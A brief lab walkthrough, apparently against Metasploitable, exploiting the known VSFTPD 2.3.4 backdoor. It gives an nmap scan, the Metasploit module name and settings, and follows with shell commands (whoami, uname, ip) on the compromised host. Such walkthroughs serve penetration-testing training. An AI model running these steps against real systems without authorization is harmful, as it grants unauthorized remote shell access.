VSFTPD v2.3.4 Backdoor
Attack FTP Service – This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
db_nmap 172.16.74.129 -sC -A -vvv
vsftpd 2.3.4
First open metasploit and search for the vulnerable service vsftpd 2.3.4
search vsftpd
search 73573
use exploit/unix/ftp/vsftpd_234_backdoor

set RHOSTS 172.16.74.129
run
Invoke Bash Shell
> shell
> bash
> whoami
> uname -a
> ip a | grep inet4
References
- OSVDB-73573
Attack Samba Server Port 445 – Metasploitable
https://security.appspot.com/vsftpd.html